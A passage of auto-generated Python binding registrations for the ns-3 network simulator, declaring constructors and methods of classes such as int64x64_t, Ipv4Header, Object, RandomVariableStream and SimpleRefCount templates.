cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('>') cls.add_binary_comparison_operator('!=') cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', u'right')) cls.add_output_stream_operator() cls.add_binary_comparison_operator('<=') cls.add_binary_comparison_operator('==') cls.add_binary_comparison_operator('>=') ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor] cls.add_constructor([]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor] cls.add_constructor([param('double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long double v) [constructor] cls.add_constructor([param('long double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor] cls.add_constructor([param('int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor] cls.add_constructor([param('long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor] cls.add_constructor([param('long long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor] cls.add_constructor([param('unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor] cls.add_constructor([param('long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor] cls.add_constructor([param('long long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor] cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor] cls.add_constructor([param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function] cls.add_method('GetDouble', 'double', [], is_const=True) ## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function] cls.add_method('GetHigh', 'int64_t', [], is_const=True) ## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function] cls.add_method('GetLow', 'uint64_t', [], is_const=True) ## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function] cls.add_method('Invert', 'ns3::int64x64_t', [param('uint64_t', 'v')], is_static=True) ## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function] cls.add_method('MulByInvert', 'void', [param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::implementation [variable] cls.add_static_attribute('implementation', 'ns3::int64x64_t::impl_type const', is_const=True) return def register_Ns3Chunk_methods(root_module, cls): ## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor] cls.add_constructor([]) ## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor] cls.add_constructor([param('ns3::Chunk const &', 'arg0')]) ## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_virtual=True) ## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3Header_methods(root_module, cls): cls.add_output_stream_operator() ## header.h (module 'network'): ns3::Header::Header() [constructor] cls.add_constructor([]) ## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor] cls.add_constructor([param('ns3::Header const &', 'arg0')]) ## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_virtual=True) ## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True) ## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3Ipv4Header_methods(root_module, cls): ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header(ns3::Ipv4Header const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Header const &', 'arg0')]) ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header() [constructor] cls.add_constructor([]) ## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::Deserialize(ns3::Buffer::Iterator start) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True) ## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::DscpTypeToString(ns3::Ipv4Header::DscpType dscp) const [member function] cls.add_method('DscpTypeToString', 'std::string', [param('ns3::Ipv4Header::DscpType', 'dscp')], is_const=True) ## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::EcnTypeToString(ns3::Ipv4Header::EcnType ecn) const [member function] cls.add_method('EcnTypeToString', 'std::string', [param('ns3::Ipv4Header::EcnType', 'ecn')], is_const=True) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::EnableChecksum() [member function] cls.add_method('EnableChecksum', 'void', []) ## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetDestination() const [member function] cls.add_method('GetDestination', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType ns3::Ipv4Header::GetDscp() const [member function] cls.add_method('GetDscp', 'ns3::Ipv4Header::DscpType', [], is_const=True) ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType ns3::Ipv4Header::GetEcn() const [member function] cls.add_method('GetEcn', 'ns3::Ipv4Header::EcnType', [], is_const=True) ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetFragmentOffset() const [member function] cls.add_method('GetFragmentOffset', 'uint16_t', [], is_const=True) ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetIdentification() const [member function] cls.add_method('GetIdentification', 'uint16_t', [], is_const=True) ## ipv4-header.h (module 'internet'): ns3::TypeId ns3::Ipv4Header::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetPayloadSize() const [member function] cls.add_method('GetPayloadSize', 'uint16_t', [], is_const=True) ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetProtocol() const [member function] cls.add_method('GetProtocol', 'uint8_t', [], is_const=True) ## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetSource() const [member function] cls.add_method('GetSource', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTos() const [member function] cls.add_method('GetTos', 'uint8_t', [], is_const=True) ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTtl() const [member function] cls.add_method('GetTtl', 'uint8_t', [], is_const=True) ## ipv4-header.h (module 'internet'): static ns3::TypeId ns3::Ipv4Header::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsChecksumOk() const [member function] cls.add_method('IsChecksumOk', 'bool', [], is_const=True) ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsDontFragment() const [member function] cls.add_method('IsDontFragment', 'bool', [], is_const=True) ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsLastFragment() const [member function] cls.add_method('IsLastFragment', 'bool', [], is_const=True) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDestination(ns3::Ipv4Address destination) [member function] cls.add_method('SetDestination', 'void', [param('ns3::Ipv4Address', 'destination')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDontFragment() [member function] cls.add_method('SetDontFragment', 'void', []) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDscp(ns3::Ipv4Header::DscpType dscp) [member function] cls.add_method('SetDscp', 'void', [param('ns3::Ipv4Header::DscpType', 'dscp')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetEcn(ns3::Ipv4Header::EcnType ecn) [member function] cls.add_method('SetEcn', 'void', [param('ns3::Ipv4Header::EcnType', 'ecn')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetFragmentOffset(uint16_t offsetBytes) [member function] cls.add_method('SetFragmentOffset', 'void', [param('uint16_t', 'offsetBytes')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetIdentification(uint16_t identification) [member function] cls.add_method('SetIdentification', 'void', [param('uint16_t', 'identification')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetLastFragment() [member function] cls.add_method('SetLastFragment', 'void', []) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMayFragment() [member function] cls.add_method('SetMayFragment', 'void', []) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMoreFragments() [member function] cls.add_method('SetMoreFragments', 'void', []) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetPayloadSize(uint16_t size) [member function] cls.add_method('SetPayloadSize', 'void', [param('uint16_t', 'size')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetProtocol(uint8_t num) [member function] cls.add_method('SetProtocol', 'void', [param('uint8_t', 'num')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetSource(ns3::Ipv4Address source) [member function] cls.add_method('SetSource', 'void', [param('ns3::Ipv4Address', 'source')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTos(uint8_t tos) [member function] cls.add_method('SetTos', 'void', [param('uint8_t', 'tos')]) ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTtl(uint8_t ttl) [member function] cls.add_method('SetTtl', 'void', [param('uint8_t', 'ttl')]) return def register_Ns3Object_methods(root_module, cls): ## object.h (module 'core'): ns3::Object::Object() [constructor] cls.add_constructor([]) ## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function] cls.add_method('AggregateObject', 'void', [param('ns3::Ptr< ns3::Object >', 'other')]) ## object.h (module 'core'): void ns3::Object::Dispose() [member function] cls.add_method('Dispose', 'void', []) ## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function] cls.add_method('GetAggregateIterator', 'ns3::Object::AggregateIterator', [], is_const=True) ## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## object.h (module 'core'): void ns3::Object::Initialize() [member function] cls.add_method('Initialize', 'void', []) ## object.h (module 'core'): bool ns3::Object::IsInitialized() const [member function] cls.add_method('IsInitialized', 'bool', [], is_const=True) ## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor] cls.add_constructor([param('ns3::Object const &', 'o')], visibility='protected') ## object.h (module 'core'): void ns3::Object::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## object.h (module 'core'): void ns3::Object::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) ## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function] cls.add_method('NotifyNewAggregate', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3ObjectAggregateIterator_methods(root_module, cls): ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')]) ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor] cls.add_constructor([]) ## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function] cls.add_method('Next', 'ns3::Ptr< ns3::Object const >', []) return def register_Ns3RandomVariableStream_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::RandomVariableStream::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream::RandomVariableStream() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetStream(int64_t stream) [member function] cls.add_method('SetStream', 'void', [param('int64_t', 'stream')]) ## random-variable-stream.h (module 'core'): int64_t ns3::RandomVariableStream::GetStream() const [member function] cls.add_method('GetStream', 'int64_t', [], is_const=True) ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetAntithetic(bool isAntithetic) [member function] cls.add_method('SetAntithetic', 'void', [param('bool', 'isAntithetic')]) ## random-variable-stream.h (module 'core'): bool ns3::RandomVariableStream::IsAntithetic() const [member function] cls.add_method('IsAntithetic', 'bool', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::RandomVariableStream::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_pure_virtual=True, is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::RandomVariableStream::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_pure_virtual=True, is_virtual=True) ## random-variable-stream.h (module 'core'): ns3::RngStream * ns3::RandomVariableStream::Peek() const [member function] cls.add_method('Peek', 'ns3::RngStream *', [], is_const=True, visibility='protected') return def register_Ns3SequentialRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::SequentialRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable::SequentialRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): ns3::Ptr<ns3::RandomVariableStream> ns3::SequentialRandomVariable::GetIncrement() const [member function] cls.add_method('GetIncrement', 'ns3::Ptr< ns3::RandomVariableStream >', [], is_const=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetConsecutive() const [member function] cls.add_method('GetConsecutive', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4MulticastRoute > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4Route > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter< ns3::NetDeviceQueue > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount(ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> 